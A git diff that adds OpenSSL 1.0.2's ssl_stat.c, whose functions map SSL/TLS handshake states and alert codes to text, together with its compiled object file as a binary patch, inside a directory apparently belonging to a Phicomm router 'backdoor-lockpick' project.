+    case SSL2_ST_SEND_SERVER_HELLO_A:
+        str = "SSLv2 write server hello A";
+        break;
+    case SSL2_ST_SEND_SERVER_HELLO_B:
+        str = "SSLv2 write server hello B";
+        break;
+    case SSL2_ST_GET_CLIENT_MASTER_KEY_A:
+        str = "SSLv2 read client master key A";
+        break;
+    case SSL2_ST_GET_CLIENT_MASTER_KEY_B:
+        str = "SSLv2 read client master key B";
+        break;
+    case SSL2_ST_SEND_SERVER_VERIFY_A:
+        str = "SSLv2 write server verify A";
+        break;
+    case SSL2_ST_SEND_SERVER_VERIFY_B:
+        str = "SSLv2 write server verify B";
+        break;
+    case SSL2_ST_SEND_SERVER_VERIFY_C:
+        str = "SSLv2 write server verify C";
+        break;
+    case SSL2_ST_GET_CLIENT_FINISHED_A:
+        str = "SSLv2 read client finished A";
+        break;
+    case SSL2_ST_GET_CLIENT_FINISHED_B:
+        str = "SSLv2 read client finished B";
+        break;
+    case SSL2_ST_SEND_SERVER_FINISHED_A:
+        str = "SSLv2 write server finished A";
+        break;
+    case SSL2_ST_SEND_SERVER_FINISHED_B:
+        str = "SSLv2 write server finished B";
+        break;
+    case SSL2_ST_SEND_REQUEST_CERTIFICATE_A:
+        str = "SSLv2 write request certificate A";
+        break;
+    case SSL2_ST_SEND_REQUEST_CERTIFICATE_B:
+        str = "SSLv2 write request certificate B";
+        break;
+    case SSL2_ST_SEND_REQUEST_CERTIFICATE_C:
+        str = "SSLv2 write request certificate C";
+        break;
+    case SSL2_ST_SEND_REQUEST_CERTIFICATE_D:
+        str = "SSLv2 write request certificate D";
+        break;
+    case SSL2_ST_X509_GET_SERVER_CERTIFICATE:
+        str = "SSLv2 X509 read server certificate";
+        break;
+    case SSL2_ST_X509_GET_CLIENT_CERTIFICATE:
+        str = "SSLv2 X509 read client certificate";
+        break;
+#endif
+
+#ifndef OPENSSL_NO_SSL3
+/* SSLv3 additions */
+    case SSL3_ST_CW_CLNT_HELLO_A:
+        str = "SSLv3 write client hello A";
+        break;
+    case SSL3_ST_CW_CLNT_HELLO_B:
+        str = "SSLv3 write client hello B";
+        break;
+    case SSL3_ST_CR_SRVR_HELLO_A:
+        str = "SSLv3 read server hello A";
+        break;
+    case SSL3_ST_CR_SRVR_HELLO_B:
+        str = "SSLv3 read server hello B";
+        break;
+    case SSL3_ST_CR_CERT_A:
+        str = "SSLv3 read server certificate A";
+        break;
+    case SSL3_ST_CR_CERT_B:
+        str = "SSLv3 read server certificate B";
+        break;
+    case SSL3_ST_CR_KEY_EXCH_A:
+        str = "SSLv3 read server key exchange A";
+        break;
+    case SSL3_ST_CR_KEY_EXCH_B:
+        str = "SSLv3 read server key exchange B";
+        break;
+    case SSL3_ST_CR_CERT_REQ_A:
+        str = "SSLv3 read server certificate request A";
+        break;
+    case SSL3_ST_CR_CERT_REQ_B:
+        str = "SSLv3 read server certificate request B";
+        break;
+    case SSL3_ST_CR_SESSION_TICKET_A:
+        str = "SSLv3 read server session ticket A";
+        break;
+    case SSL3_ST_CR_SESSION_TICKET_B:
+        str = "SSLv3 read server session ticket B";
+        break;
+    case SSL3_ST_CR_SRVR_DONE_A:
+        str = "SSLv3 read server done A";
+        break;
+    case SSL3_ST_CR_SRVR_DONE_B:
+        str = "SSLv3 read server done B";
+        break;
+    case SSL3_ST_CW_CERT_A:
+        str = "SSLv3 write client certificate A";
+        break;
+    case SSL3_ST_CW_CERT_B:
+        str = "SSLv3 write client certificate B";
+        break;
+    case SSL3_ST_CW_CERT_C:
+        str = "SSLv3 write client certificate C";
+        break;
+    case SSL3_ST_CW_CERT_D:
+        str = "SSLv3 write client certificate D";
+        break;
+    case SSL3_ST_CW_KEY_EXCH_A:
+        str = "SSLv3 write client key exchange A";
+        break;
+    case SSL3_ST_CW_KEY_EXCH_B:
+        str = "SSLv3 write client key exchange B";
+        break;
+    case SSL3_ST_CW_CERT_VRFY_A:
+        str = "SSLv3 write certificate verify A";
+        break;
+    case SSL3_ST_CW_CERT_VRFY_B:
+        str = "SSLv3 write certificate verify B";
+        break;
+
+    case SSL3_ST_CW_CHANGE_A:
+    case SSL3_ST_SW_CHANGE_A:
+        str = "SSLv3 write change cipher spec A";
+        break;
+    case SSL3_ST_CW_CHANGE_B:
+    case SSL3_ST_SW_CHANGE_B:
+        str = "SSLv3 write change cipher spec B";
+        break;
+    case SSL3_ST_CW_FINISHED_A:
+    case SSL3_ST_SW_FINISHED_A:
+        str = "SSLv3 write finished A";
+        break;
+    case SSL3_ST_CW_FINISHED_B:
+    case SSL3_ST_SW_FINISHED_B:
+        str = "SSLv3 write finished B";
+        break;
+    case SSL3_ST_CR_CHANGE_A:
+    case SSL3_ST_SR_CHANGE_A:
+        str = "SSLv3 read change cipher spec A";
+        break;
+    case SSL3_ST_CR_CHANGE_B:
+    case SSL3_ST_SR_CHANGE_B:
+        str = "SSLv3 read change cipher spec B";
+        break;
+    case SSL3_ST_CR_FINISHED_A:
+    case SSL3_ST_SR_FINISHED_A:
+        str = "SSLv3 read finished A";
+        break;
+    case SSL3_ST_CR_FINISHED_B:
+    case SSL3_ST_SR_FINISHED_B:
+        str = "SSLv3 read finished B";
+        break;
+
+    case SSL3_ST_CW_FLUSH:
+    case SSL3_ST_SW_FLUSH:
+        str = "SSLv3 flush data";
+        break;
+
+    case SSL3_ST_SR_CLNT_HELLO_A:
+        str = "SSLv3 read client hello A";
+        break;
+    case SSL3_ST_SR_CLNT_HELLO_B:
+        str = "SSLv3 read client hello B";
+        break;
+    case SSL3_ST_SR_CLNT_HELLO_C:
+        str = "SSLv3 read client hello C";
+        break;
+    case SSL3_ST_SW_HELLO_REQ_A:
+        str = "SSLv3 write hello request A";
+        break;
+    case SSL3_ST_SW_HELLO_REQ_B:
+        str = "SSLv3 write hello request B";
+        break;
+    case SSL3_ST_SW_HELLO_REQ_C:
+        str = "SSLv3 write hello request C";
+        break;
+    case SSL3_ST_SW_SRVR_HELLO_A:
+        str = "SSLv3 write server hello A";
+        break;
+    case SSL3_ST_SW_SRVR_HELLO_B:
+        str = "SSLv3 write server hello B";
+        break;
+    case SSL3_ST_SW_CERT_A:
+        str = "SSLv3 write certificate A";
+        break;
+    case SSL3_ST_SW_CERT_B:
+        str = "SSLv3 write certificate B";
+        break;
+    case SSL3_ST_SW_KEY_EXCH_A:
+        str = "SSLv3 write key exchange A";
+        break;
+    case SSL3_ST_SW_KEY_EXCH_B:
+        str = "SSLv3 write key exchange B";
+        break;
+    case SSL3_ST_SW_CERT_REQ_A:
+        str = "SSLv3 write certificate request A";
+        break;
+    case SSL3_ST_SW_CERT_REQ_B:
+        str = "SSLv3 write certificate request B";
+        break;
+    case SSL3_ST_SW_SESSION_TICKET_A:
+        str = "SSLv3 write session ticket A";
+        break;
+    case SSL3_ST_SW_SESSION_TICKET_B:
+        str = "SSLv3 write session ticket B";
+        break;
+    case SSL3_ST_SW_SRVR_DONE_A:
+        str = "SSLv3 write server done A";
+        break;
+    case SSL3_ST_SW_SRVR_DONE_B:
+        str = "SSLv3 write server done B";
+        break;
+    case SSL3_ST_SR_CERT_A:
+        str = "SSLv3 read client certificate A";
+        break;
+    case SSL3_ST_SR_CERT_B:
+        str = "SSLv3 read client certificate B";
+        break;
+    case SSL3_ST_SR_KEY_EXCH_A:
+        str = "SSLv3 read client key exchange A";
+        break;
+    case SSL3_ST_SR_KEY_EXCH_B:
+        str = "SSLv3 read client key exchange B";
+        break;
+    case SSL3_ST_SR_CERT_VRFY_A:
+        str = "SSLv3 read certificate verify A";
+        break;
+    case SSL3_ST_SR_CERT_VRFY_B:
+        str = "SSLv3 read certificate verify B";
+        break;
+#endif
+
+/* SSLv2/v3 compatibility states */
+/* client */
+    case SSL23_ST_CW_CLNT_HELLO_A:
+        str = "SSLv2/v3 write client hello A";
+        break;
+    case SSL23_ST_CW_CLNT_HELLO_B:
+        str = "SSLv2/v3 write client hello B";
+        break;
+    case SSL23_ST_CR_SRVR_HELLO_A:
+        str = "SSLv2/v3 read server hello A";
+        break;
+    case SSL23_ST_CR_SRVR_HELLO_B:
+        str = "SSLv2/v3 read server hello B";
+        break;
+/* server */
+    case SSL23_ST_SR_CLNT_HELLO_A:
+        str = "SSLv2/v3 read client hello A";
+        break;
+    case SSL23_ST_SR_CLNT_HELLO_B:
+        str = "SSLv2/v3 read client hello B";
+        break;
+
+/* DTLS */
+    case DTLS1_ST_CR_HELLO_VERIFY_REQUEST_A:
+        str = "DTLS1 read hello verify request A";
+        break;
+    case DTLS1_ST_CR_HELLO_VERIFY_REQUEST_B:
+        str = "DTLS1 read hello verify request B";
+        break;
+    case DTLS1_ST_SW_HELLO_VERIFY_REQUEST_A:
+        str = "DTLS1 write hello verify request A";
+        break;
+    case DTLS1_ST_SW_HELLO_VERIFY_REQUEST_B:
+        str = "DTLS1 write hello verify request B";
+        break;
+
+    default:
+        str = "unknown state";
+        break;
+    }
+    return (str);
+}
+
+const char *SSL_rstate_string_long(const SSL *s)
+{
+    const char *str;
+
+    switch (s->rstate) {
+    case SSL_ST_READ_HEADER:
+        str = "read header";
+        break;
+    case SSL_ST_READ_BODY:
+        str = "read body";
+        break;
+    case SSL_ST_READ_DONE:
+        str = "read done";
+        break;
+    default:
+        str = "unknown";
+        break;
+    }
+    return (str);
+}
+
+const char *SSL_state_string(const SSL *s)
+{
+    const char *str;
+
+    switch (s->state) {
+    case SSL_ST_BEFORE:
+        str = "PINIT ";
+        break;
+    case SSL_ST_ACCEPT:
+        str = "AINIT ";
+        break;
+    case SSL_ST_CONNECT:
+        str = "CINIT ";
+        break;
+    case SSL_ST_OK:
+        str = "SSLOK ";
+        break;
+#ifndef OPENSSL_NO_SSL2
+    case SSL2_ST_CLIENT_START_ENCRYPTION:
+        str = "2CSENC";
+        break;
+    case SSL2_ST_SERVER_START_ENCRYPTION:
+        str = "2SSENC";
+        break;
+    case SSL2_ST_SEND_CLIENT_HELLO_A:
+        str = "2SCH_A";
+        break;
+    case SSL2_ST_SEND_CLIENT_HELLO_B:
+        str = "2SCH_B";
+        break;
+    case SSL2_ST_GET_SERVER_HELLO_A:
+        str = "2GSH_A";
+        break;
+    case SSL2_ST_GET_SERVER_HELLO_B:
+        str = "2GSH_B";
+        break;
+    case SSL2_ST_SEND_CLIENT_MASTER_KEY_A:
+        str = "2SCMKA";
+        break;
+    case SSL2_ST_SEND_CLIENT_MASTER_KEY_B:
+        str = "2SCMKB";
+        break;
+    case SSL2_ST_SEND_CLIENT_FINISHED_A:
+        str = "2SCF_A";
+        break;
+    case SSL2_ST_SEND_CLIENT_FINISHED_B:
+        str = "2SCF_B";
+        break;
+    case SSL2_ST_SEND_CLIENT_CERTIFICATE_A:
+        str = "2SCC_A";
+        break;
+    case SSL2_ST_SEND_CLIENT_CERTIFICATE_B:
+        str = "2SCC_B";
+        break;
+    case SSL2_ST_SEND_CLIENT_CERTIFICATE_C:
+        str = "2SCC_C";
+        break;
+    case SSL2_ST_SEND_CLIENT_CERTIFICATE_D:
+        str = "2SCC_D";
+        break;
+    case SSL2_ST_GET_SERVER_VERIFY_A:
+        str = "2GSV_A";
+        break;
+    case SSL2_ST_GET_SERVER_VERIFY_B:
+        str = "2GSV_B";
+        break;
+    case SSL2_ST_GET_SERVER_FINISHED_A:
+        str = "2GSF_A";
+        break;
+    case SSL2_ST_GET_SERVER_FINISHED_B:
+        str = "2GSF_B";
+        break;
+    case SSL2_ST_GET_CLIENT_HELLO_A:
+        str = "2GCH_A";
+        break;
+    case SSL2_ST_GET_CLIENT_HELLO_B:
+        str = "2GCH_B";
+        break;
+    case SSL2_ST_GET_CLIENT_HELLO_C:
+        str = "2GCH_C";
+        break;
+    case SSL2_ST_SEND_SERVER_HELLO_A:
+        str = "2SSH_A";
+        break;
+    case SSL2_ST_SEND_SERVER_HELLO_B:
+        str = "2SSH_B";
+        break;
+    case SSL2_ST_GET_CLIENT_MASTER_KEY_A:
+        str = "2GCMKA";
+        break;
+    case SSL2_ST_GET_CLIENT_MASTER_KEY_B:
+        str = "2GCMKA";
+        break;
+    case SSL2_ST_SEND_SERVER_VERIFY_A:
+        str = "2SSV_A";
+        break;
+    case SSL2_ST_SEND_SERVER_VERIFY_B:
+        str = "2SSV_B";
+        break;
+    case SSL2_ST_SEND_SERVER_VERIFY_C:
+        str = "2SSV_C";
+        break;
+    case SSL2_ST_GET_CLIENT_FINISHED_A:
+        str = "2GCF_A";
+        break;
+    case SSL2_ST_GET_CLIENT_FINISHED_B:
+        str = "2GCF_B";
+        break;
+    case SSL2_ST_SEND_SERVER_FINISHED_A:
+        str = "2SSF_A";
+        break;
+    case SSL2_ST_SEND_SERVER_FINISHED_B:
+        str = "2SSF_B";
+        break;
+    case SSL2_ST_SEND_REQUEST_CERTIFICATE_A:
+        str = "2SRC_A";
+        break;
+    case SSL2_ST_SEND_REQUEST_CERTIFICATE_B:
+        str = "2SRC_B";
+        break;
+    case SSL2_ST_SEND_REQUEST_CERTIFICATE_C:
+        str = "2SRC_C";
+        break;
+    case SSL2_ST_SEND_REQUEST_CERTIFICATE_D:
+        str = "2SRC_D";
+        break;
+    case SSL2_ST_X509_GET_SERVER_CERTIFICATE:
+        str = "2X9GSC";
+        break;
+    case SSL2_ST_X509_GET_CLIENT_CERTIFICATE:
+        str = "2X9GCC";
+        break;
+#endif
+
+#ifndef OPENSSL_NO_SSL3
+/* SSLv3 additions */
+    case SSL3_ST_SW_FLUSH:
+    case SSL3_ST_CW_FLUSH:
+        str = "3FLUSH";
+        break;
+    case SSL3_ST_CW_CLNT_HELLO_A:
+        str = "3WCH_A";
+        break;
+    case SSL3_ST_CW_CLNT_HELLO_B:
+        str = "3WCH_B";
+        break;
+    case SSL3_ST_CR_SRVR_HELLO_A:
+        str = "3RSH_A";
+        break;
+    case SSL3_ST_CR_SRVR_HELLO_B:
+        str = "3RSH_B";
+        break;
+    case SSL3_ST_CR_CERT_A:
+        str = "3RSC_A";
+        break;
+    case SSL3_ST_CR_CERT_B:
+        str = "3RSC_B";
+        break;
+    case SSL3_ST_CR_KEY_EXCH_A:
+        str = "3RSKEA";
+        break;
+    case SSL3_ST_CR_KEY_EXCH_B:
+        str = "3RSKEB";
+        break;
+    case SSL3_ST_CR_CERT_REQ_A:
+        str = "3RCR_A";
+        break;
+    case SSL3_ST_CR_CERT_REQ_B:
+        str = "3RCR_B";
+        break;
+    case SSL3_ST_CR_SRVR_DONE_A:
+        str = "3RSD_A";
+        break;
+    case SSL3_ST_CR_SRVR_DONE_B:
+        str = "3RSD_B";
+        break;
+    case SSL3_ST_CW_CERT_A:
+        str = "3WCC_A";
+        break;
+    case SSL3_ST_CW_CERT_B:
+        str = "3WCC_B";
+        break;
+    case SSL3_ST_CW_CERT_C:
+        str = "3WCC_C";
+        break;
+    case SSL3_ST_CW_CERT_D:
+        str = "3WCC_D";
+        break;
+    case SSL3_ST_CW_KEY_EXCH_A:
+        str = "3WCKEA";
+        break;
+    case SSL3_ST_CW_KEY_EXCH_B:
+        str = "3WCKEB";
+        break;
+    case SSL3_ST_CW_CERT_VRFY_A:
+        str = "3WCV_A";
+        break;
+    case SSL3_ST_CW_CERT_VRFY_B:
+        str = "3WCV_B";
+        break;
+
+    case SSL3_ST_SW_CHANGE_A:
+    case SSL3_ST_CW_CHANGE_A:
+        str = "3WCCSA";
+        break;
+    case SSL3_ST_SW_CHANGE_B:
+    case SSL3_ST_CW_CHANGE_B:
+        str = "3WCCSB";
+        break;
+    case SSL3_ST_SW_FINISHED_A:
+    case SSL3_ST_CW_FINISHED_A:
+        str = "3WFINA";
+        break;
+    case SSL3_ST_SW_FINISHED_B:
+    case SSL3_ST_CW_FINISHED_B:
+        str = "3WFINB";
+        break;
+    case SSL3_ST_SR_CHANGE_A:
+    case SSL3_ST_CR_CHANGE_A:
+        str = "3RCCSA";
+        break;
+    case SSL3_ST_SR_CHANGE_B:
+    case SSL3_ST_CR_CHANGE_B:
+        str = "3RCCSB";
+        break;
+    case SSL3_ST_SR_FINISHED_A:
+    case SSL3_ST_CR_FINISHED_A:
+        str = "3RFINA";
+        break;
+    case SSL3_ST_SR_FINISHED_B:
+    case SSL3_ST_CR_FINISHED_B:
+        str = "3RFINB";
+        break;
+
+    case SSL3_ST_SW_HELLO_REQ_A:
+        str = "3WHR_A";
+        break;
+    case SSL3_ST_SW_HELLO_REQ_B:
+        str = "3WHR_B";
+        break;
+    case SSL3_ST_SW_HELLO_REQ_C:
+        str = "3WHR_C";
+        break;
+    case SSL3_ST_SR_CLNT_HELLO_A:
+        str = "3RCH_A";
+        break;
+    case SSL3_ST_SR_CLNT_HELLO_B:
+        str = "3RCH_B";
+        break;
+    case SSL3_ST_SR_CLNT_HELLO_C:
+        str = "3RCH_C";
+        break;
+    case SSL3_ST_SW_SRVR_HELLO_A:
+        str = "3WSH_A";
+        break;
+    case SSL3_ST_SW_SRVR_HELLO_B:
+        str = "3WSH_B";
+        break;
+    case SSL3_ST_SW_CERT_A:
+        str = "3WSC_A";
+        break;
+    case SSL3_ST_SW_CERT_B:
+        str = "3WSC_B";
+        break;
+    case SSL3_ST_SW_KEY_EXCH_A:
+        str = "3WSKEA";
+        break;
+    case SSL3_ST_SW_KEY_EXCH_B:
+        str = "3WSKEB";
+        break;
+    case SSL3_ST_SW_CERT_REQ_A:
+        str = "3WCR_A";
+        break;
+    case SSL3_ST_SW_CERT_REQ_B:
+        str = "3WCR_B";
+        break;
+    case SSL3_ST_SW_SRVR_DONE_A:
+        str = "3WSD_A";
+        break;
+    case SSL3_ST_SW_SRVR_DONE_B:
+        str = "3WSD_B";
+        break;
+    case SSL3_ST_SR_CERT_A:
+        str = "3RCC_A";
+        break;
+    case SSL3_ST_SR_CERT_B:
+        str = "3RCC_B";
+        break;
+    case SSL3_ST_SR_KEY_EXCH_A:
+        str = "3RCKEA";
+        break;
+    case SSL3_ST_SR_KEY_EXCH_B:
+        str = "3RCKEB";
+        break;
+    case SSL3_ST_SR_CERT_VRFY_A:
+        str = "3RCV_A";
+        break;
+    case SSL3_ST_SR_CERT_VRFY_B:
+        str = "3RCV_B";
+        break;
+#endif
+
+/* SSLv2/v3 compatibility states */
+/* client */
+    case SSL23_ST_CW_CLNT_HELLO_A:
+        str = "23WCHA";
+        break;
+    case SSL23_ST_CW_CLNT_HELLO_B:
+        str = "23WCHB";
+        break;
+    case SSL23_ST_CR_SRVR_HELLO_A:
+        str = "23RSHA";
+        break;
+    case SSL23_ST_CR_SRVR_HELLO_B:
+        str = "23RSHA";
+        break;
+/* server */
+    case SSL23_ST_SR_CLNT_HELLO_A:
+        str = "23RCHA";
+        break;
+    case SSL23_ST_SR_CLNT_HELLO_B:
+        str = "23RCHB";
+        break;
+
+/* DTLS */
+    case DTLS1_ST_CR_HELLO_VERIFY_REQUEST_A:
+        str = "DRCHVA";
+        break;
+    case DTLS1_ST_CR_HELLO_VERIFY_REQUEST_B:
+        str = "DRCHVB";
+        break;
+    case DTLS1_ST_SW_HELLO_VERIFY_REQUEST_A:
+        str = "DWCHVA";
+        break;
+    case DTLS1_ST_SW_HELLO_VERIFY_REQUEST_B:
+        str = "DWCHVB";
+        break;
+
+    default:
+        str = "UNKWN ";
+        break;
+    }
+    return (str);
+}
+
+const char *SSL_alert_type_string_long(int value)
+{
+    value >>= 8;
+    if (value == SSL3_AL_WARNING)
+        return ("warning");
+    else if (value == SSL3_AL_FATAL)
+        return ("fatal");
+    else
+        return ("unknown");
+}
+
+const char *SSL_alert_type_string(int value)
+{
+    value >>= 8;
+    if (value == SSL3_AL_WARNING)
+        return ("W");
+    else if (value == SSL3_AL_FATAL)
+        return ("F");
+    else
+        return ("U");
+}
+
+const char *SSL_alert_desc_string(int value)
+{
+    const char *str;
+
+    switch (value & 0xff) {
+    case SSL3_AD_CLOSE_NOTIFY:
+        str = "CN";
+        break;
+    case SSL3_AD_UNEXPECTED_MESSAGE:
+        str = "UM";
+        break;
+    case SSL3_AD_BAD_RECORD_MAC:
+        str = "BM";
+        break;
+    case SSL3_AD_DECOMPRESSION_FAILURE:
+        str = "DF";
+        break;
+    case SSL3_AD_HANDSHAKE_FAILURE:
+        str = "HF";
+        break;
+    case SSL3_AD_NO_CERTIFICATE:
+        str = "NC";
+        break;
+    case SSL3_AD_BAD_CERTIFICATE:
+        str = "BC";
+        break;
+    case SSL3_AD_UNSUPPORTED_CERTIFICATE:
+        str = "UC";
+        break;
+    case SSL3_AD_CERTIFICATE_REVOKED:
+        str = "CR";
+        break;
+    case SSL3_AD_CERTIFICATE_EXPIRED:
+        str = "CE";
+        break;
+    case SSL3_AD_CERTIFICATE_UNKNOWN:
+        str = "CU";
+        break;
+    case SSL3_AD_ILLEGAL_PARAMETER:
+        str = "IP";
+        break;
+    case TLS1_AD_DECRYPTION_FAILED:
+        str = "DC";
+        break;
+    case TLS1_AD_RECORD_OVERFLOW:
+        str = "RO";
+        break;
+    case TLS1_AD_UNKNOWN_CA:
+        str = "CA";
+        break;
+    case TLS1_AD_ACCESS_DENIED:
+        str = "AD";
+        break;
+    case TLS1_AD_DECODE_ERROR:
+        str = "DE";
+        break;
+    case TLS1_AD_DECRYPT_ERROR:
+        str = "CY";
+        break;
+    case TLS1_AD_EXPORT_RESTRICTION:
+        str = "ER";
+        break;
+    case TLS1_AD_PROTOCOL_VERSION:
+        str = "PV";
+        break;
+    case TLS1_AD_INSUFFICIENT_SECURITY:
+        str = "IS";
+        break;
+    case TLS1_AD_INTERNAL_ERROR:
+        str = "IE";
+        break;
+    case TLS1_AD_USER_CANCELLED:
+        str = "US";
+        break;
+    case TLS1_AD_NO_RENEGOTIATION:
+        str = "NR";
+        break;
+    case TLS1_AD_UNSUPPORTED_EXTENSION:
+        str = "UE";
+        break;
+    case TLS1_AD_CERTIFICATE_UNOBTAINABLE:
+        str = "CO";
+        break;
+    case TLS1_AD_UNRECOGNIZED_NAME:
+        str = "UN";
+        break;
+    case TLS1_AD_BAD_CERTIFICATE_STATUS_RESPONSE:
+        str = "BR";
+        break;
+    case TLS1_AD_BAD_CERTIFICATE_HASH_VALUE:
+        str = "BH";
+        break;
+    case TLS1_AD_UNKNOWN_PSK_IDENTITY:
+        str = "UP";
+        break;
+    default:
+        str = "UK";
+        break;
+    }
+    return (str);
+}
+
+const char *SSL_alert_desc_string_long(int value)
+{
+    const char *str;
+
+    switch (value & 0xff) {
+    case SSL3_AD_CLOSE_NOTIFY:
+        str = "close notify";
+        break;
+    case SSL3_AD_UNEXPECTED_MESSAGE:
+        str = "unexpected_message";
+        break;
+    case SSL3_AD_BAD_RECORD_MAC:
+        str = "bad record mac";
+        break;
+    case SSL3_AD_DECOMPRESSION_FAILURE:
+        str = "decompression failure";
+        break;
+    case SSL3_AD_HANDSHAKE_FAILURE:
+        str = "handshake failure";
+        break;
+    case SSL3_AD_NO_CERTIFICATE:
+        str = "no certificate";
+        break;
+    case SSL3_AD_BAD_CERTIFICATE:
+        str = "bad certificate";
+        break;
+    case SSL3_AD_UNSUPPORTED_CERTIFICATE:
+        str = "unsupported certificate";
+        break;
+    case SSL3_AD_CERTIFICATE_REVOKED:
+        str = "certificate revoked";
+        break;
+    case SSL3_AD_CERTIFICATE_EXPIRED:
+        str = "certificate expired";
+        break;
+    case SSL3_AD_CERTIFICATE_UNKNOWN:
+        str = "certificate unknown";
+        break;
+    case SSL3_AD_ILLEGAL_PARAMETER:
+        str = "illegal parameter";
+        break;
+    case TLS1_AD_DECRYPTION_FAILED:
+        str = "decryption failed";
+        break;
+    case TLS1_AD_RECORD_OVERFLOW:
+        str = "record overflow";
+        break;
+    case TLS1_AD_UNKNOWN_CA:
+        str = "unknown CA";
+        break;
+    case TLS1_AD_ACCESS_DENIED:
+        str = "access denied";
+        break;
+    case TLS1_AD_DECODE_ERROR:
+        str = "decode error";
+        break;
+    case TLS1_AD_DECRYPT_ERROR:
+        str = "decrypt error";
+        break;
+    case TLS1_AD_EXPORT_RESTRICTION:
+        str = "export restriction";
+        break;
+    case TLS1_AD_PROTOCOL_VERSION:
+        str = "protocol version";
+        break;
+    case TLS1_AD_INSUFFICIENT_SECURITY:
+        str = "insufficient security";
+        break;
+    case TLS1_AD_INTERNAL_ERROR:
+        str = "internal error";
+        break;
+    case TLS1_AD_USER_CANCELLED:
+        str = "user canceled";
+        break;
+    case TLS1_AD_NO_RENEGOTIATION:
+        str = "no renegotiation";
+        break;
+    case TLS1_AD_UNSUPPORTED_EXTENSION:
+        str = "unsupported extension";
+        break;
+    case TLS1_AD_CERTIFICATE_UNOBTAINABLE:
+        str = "certificate unobtainable";
+        break;
+    case TLS1_AD_UNRECOGNIZED_NAME:
+        str = "unrecognized name";
+        break;
+    case TLS1_AD_BAD_CERTIFICATE_STATUS_RESPONSE:
+        str = "bad certificate status response";
+        break;
+    case TLS1_AD_BAD_CERTIFICATE_HASH_VALUE:
+        str = "bad certificate hash value";
+        break;
+    case TLS1_AD_UNKNOWN_PSK_IDENTITY:
+        str = "unknown PSK identity";
+        break;
+    default:
+        str = "unknown";
+        break;
+    }
+    return (str);
+}
+
+const char *SSL_rstate_string(const SSL *s)
+{
+    const char *str;
+
+    switch (s->rstate) {
+    case SSL_ST_READ_HEADER:
+        str = "RH";
+        break;
+    case SSL_ST_READ_BODY:
+        str = "RB";
+        break;
+    case SSL_ST_READ_DONE:
+        str = "RD";
+        break;
+    default:
+        str = "unknown";
+        break;
+    }
+    return (str);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_stat.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_stat.o
new file mode 100644
index 0000000000000000000000000000000000000000..8563e0479354c1e04c7cabdca283359e5b09f243
GIT binary patch
literal 15472
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
